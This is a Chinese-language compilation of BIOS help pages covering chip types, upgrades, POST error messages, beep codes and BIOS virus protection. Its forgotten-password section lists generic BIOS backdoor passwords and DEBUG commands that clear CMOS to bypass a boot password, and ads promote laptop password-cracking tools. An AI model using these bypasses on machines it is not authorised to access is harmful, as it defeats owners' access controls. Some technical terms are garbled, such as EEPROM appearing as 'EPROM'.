为了充分发挥主板的性能，支持层出不穷的新硬件，并改正以前BIOS版本中的缺陷，厂家不断推出新的BIOS版本。利用专用的刷新程序，改写主板BIOS的内容，这就是我们常说的BIOS升级。现在的主板几乎都采用FLASH ROM(快闪ROM)作BIOS，在一定的电压、电流条件下，可对其Firmware进行改写。

--------------------------------------------------------------------------------

Q：为什么BIOS升级具有很大的危险性？

A：BIOS存储在主板上的ROM 芯片中，这确保了BIOS的一般可用性和不会因为磁盘错误而损坏。BIOS在整个PC机系统中的地位，决定了它的重要性。它是否正常工作、是否能工作，直接决定了整个微机系统的生死。据不完全统计，主板的不良原因中有60%至80%是由于主板的BIOS芯片引起的，因此，BIOS的正常工作就显得尤其重要！但是，升级BIOS在提升性能的同时，常会出现一些不可预料的事。在升级过程中断电、升级时用错了升级文件、升级文件的版本不正确、升级文件被修改过（例受病毒侵袭过）等，都会造成重开机时没有显示。正因为此，一些主板厂家，如采用i820芯片组的华硕系列主板采用更贴近用户的方式来升级BIOS，在新出的华硕P3C系列主板中，具有方便的Live Update功能，更新BIOS时，只需要放入随机附带的驱动程序光盘，在选定更新BIOS的选项后，即可全自动下载最新版的BIOS，并全自动更新，避免了用户在操作上的失误。

--------------------------------------------------------------------------------

Q：什么样的BIOS才能升级 ?

A：从BIOS出现至今，BIOS的存储介质由ROM、EPROM、EEPROM到今天的FLASH ROM，ROM的形式不同，更新其内部Firmware的方法也不同。ROM中的内容是无法更新的，一旦完成芯片的制造过程，其内部的内容便只能读出不能写入；EPROM的擦除要使用专用的紫外线擦除器，普通用户也无法完成对其的擦除、刷新的过程。从EEPROM起，BIOS芯片可以借助一定的电压（＋12V）或电流，使用专用的程序完成刷新的过程，从而使EEPROM芯片能够迅速为市场所接受。FLASH ROM的更新更为简单，不需要特定的条件，在工作电压（＋5V）下，利用刷新程序即可完成芯片的刷新。

--------------------------------------------------------------------------------

Q：什么是ROM、EPROM、EEPROM、FLASH ROM？

A：在微机的发展初期，BIOS都存放在ROM（Read Only Memory，只读存储器）中。ROM内部的资料是在ROM的制造工序中，在工厂里用特殊的方法被烧录进去的，其中的内容只能读不能改，一旦烧录进去，用户只能验证写入的资料是否正确，不能再作任何修改。如果发现资料有任何错误，则只有舍弃不用，重新订做一份。ROM是在生产线上生产的，由于成本高，一般只用在大批量应用的场合。

  由于ROM制造和升级的不便，后来人们发明了PROM（Programmable ROM，可编程ROM）。最初从工厂中制作完成的PROM内部并没有资料，用户可以用专用的编程器将自己的资料写入，但是这种机会只有一次，一旦写入后也无法修改，若是出了错误，已写入的芯片只能报废。PROM的特性和ROM相同，但是其成本比ROM高，而且写入资料的速度比ROM的量产速度要慢，一般只适用于少量需求的场合或是ROM量产前的验证。

  EPROM（Erasable Programmable ROM，可擦除可编程ROM）芯片可重复擦除和写入，解决了PROM芯片只能写入一次的弊端。EPROM芯片有一个很明显的特征，在其正面的陶瓷封装上，开有一个玻璃窗口，透过该窗口，可以看到其内部的集成电路，紫外线透过该孔照射内部芯片就可以擦除其内的数据，完成芯片擦除的操作要用到EPROM擦除器。EPROM内资料的写入要用专用的编程器，并且往芯片中写内容时必须要加一定的编程电压（VPP=12—24V，随不同的芯片型号而定）。EPROM的型号是以27开头的，如27C020(8*256K)是一片2M Bits容量的EPROM芯片。EPROM芯片在写入资料后，还要以不透光的贴纸或胶布把窗口封住，以免受到周围的紫外线照射而使资料受损。

  鉴于EPROM操作的不便，后来出的主板上的BIOS ROM芯片大部分都采用EPROM（Electrically Erasable Programmable ROM，电可擦除可编程ROM）。EPROM的擦除不需要借助于其它设备，它是以电子信号来修改其内容的，而且是以Byte为最小修改单位，不必将资料全部洗掉才能写入，彻底摆脱了EPROM Eraser和编程器的束缚。EPROM在写入数据时，仍要利用一定的编程电压，此时，只需用厂商提供的专用刷新程序就可以轻而易举地改写内容，所以，它属于双电压芯片。借助于EPROM芯片的双电压特性，可以使BIOS具有良好的防毒功能，在升级时，把跳线开关打至“ON”的位置，即给芯片加上相应的编程电压，就可以方便地升级；平时使用时，则把跳线开关打至“OFF”的位置，防止CIH类的病毒对BIOS芯片的非法修改。所以，至今仍有不少主板采用EPROM作为BIOS芯片并作为自己主板的一大特色。

  FLASH ROM则属于真正的单电压芯片，在使用上很类似EPROM，因此，有些书籍上便把FLASH ROM作为EPROM的一种。事实上，二者还是有差别的。FLASH ROM在擦除时，也要执行专用的刷新程序，但是在删除资料时，并非以Byte为基本单位，而是以Sector（又称Block）为最小单位，Sector的大小随厂商的不同而有所不同；只有在写入时，才以Byte为最小单位写入；FLASH ROM芯片的读和写操作都是在单电压下进行，不需跳线，只利用专用程序即可方便地修改其内容；FLASH ROM的存储容量普遍大于EPROM，约为512K到至8M KBit，由于大批量生产，价格也比较合适，很适合用来存放程序码，近年来已逐渐取代了EPROM，广泛用于主板的BIOS ROM，也是CIH攻击的主要目标。

--------------------------------------------------------------------------------

BIOS问答2

BIOS有备无患，德邦双BIOS组件帮您忙！

多功能BIOS编程器，修复BIOS的最佳工具

24RF08编程器,国内唯一支持24RF08的简易编程器

笔记本密码破解全套工具,破解笔记本开机密码不再高不可攀!

BIOS专页制作完成　 网址：http://www.rebios.net　 信箱：bios@vip.sina.com


BIOS详解

《一键清理系统垃圾》

BIOS详解

BIOS详解(一)

   对于不少新手，刷新BIOS还是比较神秘的。而对于一些BIOS相关的知识，不少人也是一知半解。在这里，我们将对BIOS作一次全面的了解。
    1、什么是BIOS
   BIOS是英文Basic Input Output System的缩略语，直译过来后中文名称就是基本输入输出系统。它的全称应该是ROM－BIOS，意思是只读存储器基本输入输出系统。其实，它是一组固化到计算机内主板上一个ROM芯片上的程序，它保存着计算机最重要的基本输入输出的程序、系统设置信息、开机上电自检程序和系统启动自举程序。有人认为既然BIOS是程序，那它就应该是属于软件，感觉就像自己常用的Word或Excel。但也很多人不这么认为，因为它与一般的软件还是有一些区别，而且它与硬件的联系也是相当地紧密。形象地说，BIOS应该是连接软件程序与硬件设备的一座桥梁，负责解决硬件的即时要求。一块主板性能优越与否，很大程度上就取决于BIOS程序的管理功能是否合理、先进。主板上的BIOS芯片或许是主板上唯一贴有标签的芯片，一般它是一块32针的双列直插式的集成电路，上面印有BIOS字样。586以前的BIOS多为可重写EPROM芯片，上面的标签起着保护BIOS内容的作用(紫外线照射会使EPROM内容丢失)，不能随便撕下。586以后的ROM BIOS多采用EEPROM(电可擦写只读ROM)，通过跳线开关和系统配带的驱动程序盘，可以对EEPROM进行重写，方便地实现BIOS升级。常见的BIOS芯片有Award、AMI、Phoenix、MR等，在芯片上都能见到厂商的标记。

      2、BIOS的作用
BIOS的主要作用有以下几方面：
     首先是自检及初始化程序:计算机电源接通后，系统将有一个对内部各个设备进行检查的过程，这是由一个通常称之为POST（Power On Self Test/上电自检）的程序来完成，这也是BIOS程序的一个功能。完整的自检包括了对CPU、640K基本内存、1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘的测试。在自检过程中若发现问题，系统将给出提示信息或鸣笛警告。
       如果没有任何问题，完成自检后BIOS将按照系统CMOS设置中的启动顺序搜寻软、硬盘驱动器及CDROM、网络服务器等有效的启动驱动器 ，读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动，你就可以放心地使用你的宝贝了。其次是硬件中断处理：计算机开机的时候，BIOS会告诉CPU等硬件设备的中断号，当你操作时输入了使用某个硬件的命令后，它就会根据中断号使用相应的硬件来完成命令的工作，最后根据其中断号跳会原来的状态。再有就是程序服务请求：从BIOS的定义可以知道它总是和计算机的输入输出设备打交道，它通过最特定的数据端口发出指令，发送或接收各类外部设备的数据，从而实现软件应用程序对硬件的操作。

BIOS详解(二)

不少朋友混淆了BIOS与CMOS的概念，这里就跟大家说说CMOS及其与BIOS的关系：

    CMOS是Complementary Metal Oxide Semiconductor的缩写，翻译出来的本意是互补金属氧化物半导体存储器，指一种大规模应用于集成电路芯片制造的原料。但在这里CMOS的准确含义是指目前绝大多数计算机中都使用的一种用电池供电的可读写的RAM芯片。而BIOS的意义我们在前面已经解释过了。
那么，CMOS与BIOS到底有什么关系呢？CMOS是存储芯片，当然是属于硬件，它的作用是具有数据保存功能，但它也只能起到存储的作用，而不能对存储于其中的数据进行设置，要对CMOS中各项参数的设置就要通过专门的设置程序。现在多数厂家将CMOS的参数设置程序做到了BIOS芯片中，在计算机打开电源时按特殊的按键进入设置程序就可以方便地对系统进行设置。也就是说BIOS中的系统设置程序是
完成CMOS参数设置的手段，而CMOS RAM是存放设置好的数据的场所，它们都与计算机的系统参数设置有很大关系。正因如此，便有?quot;CMOS设置和BIOS设置两种说法，其实，准确的说法应该是通过BIOS设置程序来对CMOS参数进行设置。BIOS和CMOS是既相关联又有区别，CMOS设置和BIOS设置只是大家对设置过程简化的两种叫法，在这种意义上它们指的都是一会事。

    CMOS存储芯片可以由主板的电池供电，即使系统掉电，存储的数据也不会丢失。但如果拿掉电池会出现什么情况呢？问得好！如果电池没有电，或是突然接触出了问题，或是你把他取下来了，那么CMOS就会因为断电而丢掉内部存储的所有数据。只不过若真有这种情况发生的话也不是什么大问题，你可以换电池，或是检查接触不良的原因，总之保证CMOS有电。再开机进入BIOS程序，选择主菜单中
的LOAD BIOS DEFAULTS或是LOAD SETUP DEFAULTS后回车，最后再确定输入Y回车即可。大家也许曾听其他玩家谈到过若忘记了开机密码就给CMOS放电的说法，其实也就是把包括密码在内的信息全丢掉，开机时就不需要输入密码了，再来重新写入数据。

    4、升级BIOS的意义

    升级BIOS的原因通常有以下几个：

  （1）提供对新的硬件或技术规范的支持。

    电脑硬件技术发展太快，主板对于一些新硬件（如K6－III Celeron II CPU）或新技术（如DMA100、DMA66、大于35GB的硬盘等）未能正确识别或不能提供支持，这时便需要通过升级BIOS来获得对新硬件或新技术的支持。

  （2）解决旧版本BIOS中存在的BUG。

  （3）解决2000年问题。不少1997年以前生产的主板都存在2000年问题，而一些新主板虽然已解决了2000年问题，但在个别Y2K测试软件下不能通过，这些问题都可通过升级BIOS来加以解决

BIOS详解(三)

5、什么样的BIOS能够升级

    观察您的主板上的BIOS芯片（一般为一个28针或32针的双列直插式的集成电路，上面有BIOS字样），该芯片大多为AWARD或AMI的产品。揭掉BIOS芯片上面的标签， 就会看到BIOS芯片的编号。对于某些主板，厂家为了节约成本而使用了不可升级的BIOS。当然，你也可以直接查看主板说明书，看上面是否有关于主板的BIOS可以升级的说明。不过，即使主板说明书上没有有关的说明，也不
必灰心，你完全可以亲自动手试一下。因为并不是所有的主板都将此特性写在说明书上的。

    这里我们有必要弄清以下几个概念，以便能更加全面的了解与BIOS相关的知识，当然，也可以用来在朋友面前吹嘘一番，呵呵。

    （1）PROM：这是英文可编程只读存储器一词的缩写，它是一种存储芯片，其中的内容一经写入就不能修改，并且在主机关掉后内容也不会消失。PROM和ROM的不同在于出厂时，PROM是一块空白无内容的芯片，而ROM出厂时，其中的内容已经写好。要在PROM中写入内容，您需要一个叫做PROM编程器的工具，该工具也叫PROM烧写器；往PROM中写入内容的过程就叫烧写。

    （2）EPROM：这是英文可擦写的可编程只读存储器的缩写，它是一种可以通过在紫外线的照射下擦除其中内容的特殊的PROM芯片。其中的内容一旦被擦除，您就可以重新写入新内容。

    （3）EEPROM：这是英文电可擦写的可编程只读存储器，它可以通过使用和电有关的手段来对其中的内容进行擦写。和其他的PROM一样，其中的内容在主机断电的情况下不会消失。

    6、有时系统出现故障，且无法显示时，就需要我们通过解读PC喇叭的“语言”来分析故障原因了
    因此，了解PC喇叭的“语言”还是很重要的，下面请看我们的开机自检响铃代码含义解析

BIOS详解(四)

    1.CMOS battery failed（CMOS 电池失效）。

    原因：说明CMOS 电池的电力已经不足，请更换新的电池。

    2.CMOS check sum error－Defaults loaded（CMOS 执行全部检查时发现错误，因此载入预设的系统设定值）。

    原因：通常发生这种状况都是因为电池电力不足所造成，所以不妨先换个电池试试看。如果问题依然存在的话，那就说明 CMOS RAM 可能有问题，最好送回原厂处理。

    3.Display switch is set incorrectly（显示开关配置错误）。

    原因：较旧型的主板上有跳线可设定显示器为单色或彩色，而这个错误提示表示主板上的设定和 BIOS 里的设定不一致，重新设定即可。

    4.Press ESC to skip memory test（内存检查，可按ESC键跳过）。

    原因：如果在 BIOS 内并没有设定快速加电自检的话，那么开机就会执行内存的测试，如果你不想等待，可按 ESC 键跳过或到 BIOS 内开启 Quick Power On Self Test。

    5.HARD DISK initializing【Please wait a moment...】（硬盘正在初始化 请等待片刻）。

    原因：这种问题在较新的硬盘上根本看不到。但在较旧的硬盘上，其启动较慢，所以就会出现这个问题。

    6.HARD DISK INSTALL FAILURE （硬盘安装失败）。

    原因：硬盘的电源线、数据线可能未接好或者硬盘跳线不当出错误 ( 例如一根数据线上的两个硬盘都设为 Master 或 Slave。)

    7.Secondary slave hard fail （检测从盘失败）。

    原因：1 CMOS 设置不当（例如没有从盘但在CMOS里设有从盘）　2 硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当。

    8.Hard disk(s) diagnosis fail (执行硬盘诊断时发生错误)。

    原因：这通常代表硬盘本身的故障。你可以先把硬盘接到另一台电脑上试一下，如果问题一样，那只好送修了。

BIOS详解(五)

    9.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)（无法驱动软驱）。

    原因：软驱的排线是否接错或松脱？电源线有没有接好？如果这些都没问题，那买个新的吧。

    10.Keyboard error or no keyboard present(键盘错误或者未接键盘)

    原因：键盘连接线是否插好？连接线是否损坏？

    11.Memory test fail (内存检测失败)

    原因：通常是因为内存不兼容或故障所导致。

    12.Override enable－Defaults loaded ( 当前CMOS设定无法启动系统，载入 BIOS 预设值以启动系统)。

    原因：可能是你在BIOS内的设定并不适合你的电脑( 像你的内存只能跑100MHz但你让它跑133MHz )，这时进入 BIOS 设定重新调整即可。

    13.Press TAB to show POST screen (按 TAB 键 可以切换屏幕显示)

    原因：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的开机显示画面，而此提
示就是要告诉使用者可以按TAB来把厂商的自定义画面和BIOS预设的开机画面进行切换。

    14.Resuming from disk，Press TAB to show POST screen（从硬盘恢复开机，按TAB显示开
机自检画面）。

    原因：某些主板的BIOS 提供了 Suspend to disk(挂起到硬盘)的功能，当使用者以 Suspend to disk 的方式来关机时，那么在下次开机时就会显示此提示消息。

BIOS详解(六)

    在电脑发生故障时，机器响铃不断。这时，如果你是一位高手，也许可以根据经验判断出故障所在，若根据经验无法判断，或者你对硬件设备一无所知，这时只有去请教专业人员了。笔者由于一台电脑出现故障，开机后只有机器报错的响铃，找不到故障点，只好上网去查询PC机开机自检响铃代码的含义，最终依据代码准确查找出故障所在部位并将其排除。好东西不敢私藏，特向大家推荐，希望你也能据此准确地判断出故障所在，当一回高手。

    本文以较常见的三种BIOS（Award BIOS、AMI BIOS和Phoenix BIOS）的电脑为例，介绍开机自检响铃代码的具体含义（关于电脑使用的BIOS型号可从BIOS芯片上或者从开机自检的信息中看到，如看到AMI的字样则为AMI BIOS；如看到Award字样则为Award BIOS）。

    一、Award BIOS自检响铃含义：

    1短：系统正常启动。恭喜，你的机器没有任何问题。
    2短：常规错误，请进入CMOS Setup，重新设置不正确的选项。
    1长1短：RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。
    1长2短：显示器或显示卡错误。
    1长3短：键盘控制器错误。检查主板。
    1长9短：主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。
    不断地响（长声）：内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。
    不停地响：电源、显示器未和显示卡连接好。检查一下所有的插头。
    重复短响：电源有问题。
    无声音无显示：电源有问题。

    二、AMI BIOS自检响铃含义：

    1短：内存刷新失败。更换内存条。
    2短：内存ECC较验错误。在CMOS Setup中将内存关于ECC校验的选项设为Disabled就可以解决，不过最根本的解决办法还是更换一条内存。
    3短：系统基本内存（第1个64kB）检查失败。换内存。
    4短：系统时钟出错。
    5短：中央处理器（CPU）错误。
    6短：键盘控制器错误。
    7短：系统实模式错误，不能切换到保护模式。
    8短：显示内存错误。显示内存有问题，更换显卡试试。
    9短：ROM BIOS检验和错误。
    1长3短：内存错误。内存损坏，更换即可。
    1长8短：显示测试错误。显示器数据线没插好或显示卡没插牢

BIOS详解(七)

    问：如何保护BIOS不被破坏？
    答：采用具备BIOS防护功能的主板，目前，这类主板比较多，比如，联想主板的无敌锁功能、技嘉等主板的双BIOS功能，INTEL810、815主板BIOS的Boot block块技术、博登主板的AIR BUS技术等，都可以有效地保护BIOS。
    有条件的话，可以把备份的BIOS文件写入一个新的芯片，做一个硬备份（ROM类型不限），以确保万一。放在抽屉里的BIOS肯定比放在主板上的后备片可靠！这样当主板的BIOS完全被破坏时，我们可用备份的BIOS替换。市场上已有部分品牌的厂家，随主板送一片后备BIOS芯片。

    对于采用EEPROM芯片作BIOS的主板，在平常状态下，要把其升级跳线（＋12V电压端）设为“OFF”，使主板上的＋12V与芯片相对应的管脚脱离，以防病毒破坏或无意中改写BIOS。对于FLASH ROM，将芯片的WE#脚和主板电路脱离，使BIOS芯片只处于读的状态，这也是一个好方法。

    平时勤于杀毒，保持一个洁净的工作环境。

    问：如何修复INTEL主板的BIOS？
    答：INTEL主板上的BIOS芯片具有Boot-block块，其BIOS 损坏后，我们可以按下述方法把BIOS修复。

    1、按INTEL的主板说明书，制作一张可启动的升级软盘。

    2、把主板上的“FLASH Recovery” 的跳线放在recovery mode的位置，把可启动的BIOS升级软盘放入，启动机器。

    因为没被覆盖的Boot-block块不支持PCI的显卡，这时屏幕上什么都没有。你可以通过鸣笛声和软盘LED来观察。当机器响了一下，接着软盘的LED亮时，系统就正在升级你的BIOS。当软盘的LED灯灭时，说明恢复已完成，关机。

    3、把跳线恢复到缺省位置，重启动修复结束。

    问：联想的无敌锁技术是怎么回事？
    答：联想的无敌锁技术是为了保护BIOS不受病毒破坏或防止无意中改写BIOS这一目的而推出的。
    无敌锁技术由三部分组成，它们分别是主板上的防写保护跳线开关JAV、内置于BIOS中的软开关Flash Write Protect和内置于BIOS中的防毒软件PC Cillin。防写保护跳线开关JAV控制BIOS芯片的“写”管脚的状态，当其关闭时，BIOS处于写保护状态，是绝对不会被改写的，纵然CIH病毒神通广大，它也无法将硬件开关打开。虽然升级时打开、关闭防写保护跳线开关有些麻烦，但这样却可以换来计算机的安全，相比之下麻烦还是必要的，况且BIOS升级的频率也并不是很高。

BIOS详解(八)

    万一出于某种原因(例如用户的粗心大意)，主板的防写保护跳线开关处于不防写状态，此时内置于BIOS中的软开关Flash Write Protect就可以发挥作用，来防止BIOS被无故改写。在软开关的防写状态下，BIOS不能被改写，但DMI却可以进行升级。

直接攻击BIOS的病毒有可能将BIOS内的防写软开关破坏。为了克服这一缺点，内置于BIOS中的防毒软件PC Cillin应运而生。这个防毒软件可以实时的查出并杀灭类似CIH的攻击BIOS的病毒。实际上，整个无敌锁技术是从几个方位对可攻击BIOS的病毒进行防卫，保护BIOS不被破坏，这是一个整体防护体系，它可在最大限度上保护BIOS。当然，再严密的防护体系也可能会出现漏洞，防止病毒攻击的最基本方法还是少用盗版软件等可能带毒的软件，并要勤于杀毒。

问 ：如何保存BIOS的设置
答：BIOS设置好后，系统是把相关的数据保存在主板的CMOS电路中的。事实上，由于CMOS中的资料丢失或受损导致无法开机的现象，我们早已是屡见不鲜了，而最常发生的就是因为CMOS的供电电池电压降低或损坏，导致CMOS中的数据丢失。通常我们都是重新设置了事，但是如果原先的设置很复杂，甚至有些项目需要经过测试才能确定，那么计算机想要恢复原来的数据恐怕就不是一件很容易的事情了。

Norton Utilities中的磁盘救援功能可以把CMOS中的数据备份成一个文件保存下来；国内常见的杀毒软件KV300也有这个功能。

问：在DEBUG里如何恢复BIOS的出厂值？
答：针对AMI/Award BIOS:

C:\DEBUG (在纯DOS下，不是windows里的DOS窗口)

-O 70 17

-O 71 17

BIOS详解(九)

    问：我的BIOS文件里用的是EPA格式的图标，我可以加入全屏的BMP LOGO图形吗？
    答：实践告诉我们，是不可以的，虽然你可以用 LOGO 参数强行把 BMP 文件写进 BIN 文件里，但开机时是毫无反应的，就像你根本就没做过一样。至于强行写入后会不会有其它副作用，就不得而知了。

    问：为什么我用EPATOBMP工具转换BMP格式的文件时提示：2564 bytes wrong？
    答：请大家注意，如果按 136*126 的格式画出来的单色BMP图形文件，其标准大小就是2582 Bytes的，如果你的不是，那应该是作图软件有问题，或者你的图形不是单色的。EPATOBMP工具支持136*126或136*84大小的单色BMP文件，二者的大小分别是2582 Bytes和1742 Bytes。

    问：我想为自己的机器增加开机时像品牌机一样的全屏画面，但写入 BMP 后花屏，或没反应
    答：如果写入16色的BMP文件不成功，一般应该是和FLASH ROM的大小有关系，毕竟它们有 1M 和 2M 之分。所以最好先看看你的 BIOS 是不是 2M 的，如果是，成功机会大些。还有就是 BMP 的文件格式问题了，由最新的资料看来，一些品牌机里面的BMP 文件并不是一个BMP 格式的图形文件，而是一个二进制的不知名的格式文件。此时，用BMP格式的图形写入，是不会成功的。

    问：写入BMP文件时，BIOS空间不足怎么办？
    答：这是一个常见的问题，一般发生在1M的BIOS中。可以用CBROM把BIOS文件中一些用不到的功能去掉（如去掉里面的AWDFLASH.EXE），然后再写入。如果想把1M的芯片换成2M的是不现实的，主要是使用1M容量BIOS的主板不支持2M容量的BIOS芯片。

              忘了BIOS的口令怎么办

    为了保护计算机的资源和安全，可以为其加上开机密码。但是一旦不小心将密码忘记，就会致使计算机不能进入BIOS设置，或者不能启动计算机。
    1.可先试一下通用口令,如AMI BIOS 的通用口令是“AMI”，AWORD BIOS 的通用口令比较多，可能有“AWORD”，“H996”，“Syzx”，“WANTGIRL”，“AwordSW”等等，输入时请注意大小写，不过很多新的主板都不支持通用口令，或者是有通用口令但大家还没有发现，所以通用口令不是万能的。
    2. 如果您的计算机能启动，但不能进入BIOS设置，可以用以下方法：通过70H和71H两个端口进行访问和更改，最简单的方法就是将其全部清除，变成缺省设置。但是有个条件就是计算机在己经启动的前提下，才能进行以下的操作。但要注意，如果您看不懂下面的操作，就不要尝试，可以使用(3)中介绍的方法。
    如下程序段可以完成对部分电脑CMOS的清除工作：
                C:\>debug
                    -o 70 20
                    -o 71 20
                    -r
                    -q
    重新启动电脑，即可进入BIOS进行一些其本设置了。有少数主板可能用这种方法行不通。
    3.当上面二种方法都不行时，一般来讲，您需要在整机断电的情况下，将电脑主板上的CMOS RAM的供电端正极与电脑主板上的内置电池或外接电池的正极断开一定的时间来解决，即大家通常所谓的“对主板放电”；目的在于使CMOS RAM中的内容由于得不到正常的供电，而内容丢失。 具体操作时， 根据不同的情况，又可能有以下几种方法：
    (1) 跳线清除法1。
    某些主板上，有一个单独的两针跳线，用来清除CMOS RAM中的内容。该跳线一般标注为CLEAR CMOS。当您需要清除CMOS RAM中的内容时，您用一只跳线器，将该跳线短接一会儿即可。需要给大家指出的是，在某些主板上（如华硕TX97-LE等），该跳线器有可能只是两个焊点，在您需要清除CMOS RAM中的内容时，您需要用一只镊子，将两个焊点连通，即可达到清除CMOS RAM内容的目的。
    (2) 跳线放电法2。
    某些主板上，有一个单独的三针跳线，用来清除CMOS RAM中的内容。该跳线的两端的两根针一般分别标注为NORMAL和RESET CMOS，即正常情况下，三针跳线器中间的一根针和标注为NORMAL的一根针短接；如果将三针跳线器中间的一根针和标注为RESET CMOS的一根针短接的话，就清除掉CMOS RAM中的内容。清除掉CMOS RAM中的内容后，请千万不要忘记将三针跳线器中间的一根针和标注为NORMAL的一根针恢复短接；否则开机时，主机将可能没有任何显示。
    (3) 跳线放电法3。
    在某些主板上，有一个单独的四针跳线，用来对CMOS RAM供电和清除CMOS RAM中的内容。该跳线的两端的两根针一般用来外接CMOS RAM的供电电池（EXTERNAL BATT）；当CMOS RAM使用主板上内置的电池供电时，就要将该跳线器中间的两根针短接。为了更便于大家理解，下面给大家介绍一下该四针跳线器四只针的电路用途：
    标为EXTERNAL BATT的一根针用来连接外接电池的正极；与其相邻的第二根针与主板上内置电池的正极相通；第三根针为CMOS RAM供电端的正极；第四根针为CMOS RAM供电端的零点位（即负极）。如果CMOS RAM采用的主板内置电池供电的话，一般情况下，用一只跳线器将第三根针和第四根针短接一会儿即可将CMOS RAM中的内容清除；短接的时间，应参照主板的说明书：一般来讲，要比前两种方法长一些。清除掉CMOS RAM中的内容后，请不要忘记将跳线器的状态恢复原状。
    (4) 跳线放电法4。
    在另外一些主板上，也有一个单独的四针跳线，用来对CMOS RAM供电和清除CMOS RAM中的内容，该跳线器四针的电路作用与方法三中的相同。只不过，这些主板的CMOS RAM采用通过四针跳线的一、四根针外接电池的方法供电。为避免该跳线外接电池接反极性，外接电池的插接连线的三号插孔就堵死了，所以主板的四针跳线器的第三根针（即与CMOS RAM供电端连接的针）也就折断了。这样，要清除CMOS RAM中的内容就可采取下面的办法：主机断电后，打开主机箱，找到CMOS RAM的外接的供电电池，将其在主板四针跳线上的插接线拔下；然后，用一万用表，打到直流电压10 V档，用黑笔接接触四针跳线的第四针（即CMOS RAM供电的负端），红笔接被扭断的第三针残留的根部，持续一段时间，当万用表的指示接近0时，即可达到放电目的。
    (5) 自然放电法。
    首先对整台微机断电，然后打开主机箱，找到主板上内部供电电池，取下；或将主板外接电池拔下，两三天后再装好，即可达到放电目的。
    (6) 短路电池法。
    还有一些机器，尤其是一些老的机器，在主板上，找不到任何有关清除CMOS RAM内容的跳线；并且电池是焊在主板上面上的。在这种情况下，可以用一根导线，分别触及该电池的正极和负极，以使得该电池的正极和负极连通；并持续一段时间，就可将CMOS RAM的内容清除。主板上的CMOS RAM的内容丢失后，在重新启动电脑时，将会出现诸如：CMOS电池无效，请重新设置其内容的提示；并且给出可以让您进入CMOS RAM设置的按键。


BIOS信息详解

《一键清理系统垃圾》

BIOS信息详解

1.CMOS battery failed

中文：CMOS电池失效。

解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。

2.CMOS check sum error－Defaults loaded

中文：CMOS 执行全部检查时发现错误，要载入系统预设值。

解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一年就让经销商送回生产厂家修一下吧！

3.Press ESC to skip memory test

中文：正在进行内存检查，可按ESC键跳过。

解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enabled，储存后重新启动即可。

4.Keyboard error or no keyboard present

中文：键盘错误或者未接键盘。

解释：检查一下键盘的连线是否松动或者损坏。

5.Hard disk install failure

中文：硬盘安装失败。

解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）。

6.Secondary slave hard fail

中文：检测从盘失败

解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。

7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)

中文：无法驱动软盘驱动器。

解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不贵。

8.Hard disk(s) diagnosis fail

中文：执行硬盘诊断时发生错误。

解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试一试，如果问题还是没有解决，只能去修一下了。

9.Memory test fail

中文：内存检测失败。

解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼容,去换一条吧！

10.Override enable－Defaults loaded

中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。

解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入系统原来的设定值然后重新启动即可。

11.Press TAB to show POST screen

中文：按TAB键可以切换屏幕显示。

解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。

12.Resuming from disk，Press TAB to show POST screen

中文：从硬盘恢复开机，按TAB显示开机自检画面）。

解释：这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能，如果我们用Suspend to disk的方式来关机，那么我们在下次开机时就会显示此提示消息。

13.Hareware Monitor found an error，enter POWER MANAGEMENT SETUP for details，Press F1 to continue，DEL to enter SETUP

中文：监视功能发现错误，进入POWER MANAGEMENT SETUP察看详细资料，按F1键继续开机程序，按DEL键进入COMS设置。

解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么便会出现上述这段话，这时可以进入COMS设置选择POWER MANAGEMENT SETUP，在右面的**Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常，然后再加以解决。


BIOS与CMOS区别

《一键清理系统垃圾》

BIOS与CMOS区别

      在日常操作和维护计算机的过程中，常常可以听到有关BIOS设置和CMOS设置的一些说法，许多人对BIOS和CMOS经常混为一谈。本文主要阐述对BIOS设置和CMOS设置在基本概念上的区分与联系。

    BIOS是什么?

    所谓BIOS，实际上就是微机的基本输入输出系统（Basic Input－Output System），其内容集成在微机主板上的一个ROM芯片上，主要保存着有关微机系统最重要的基本输入输出程序，系统信息设置、开机上电自检程序和系统启动自举程序等。

BIOS的功用

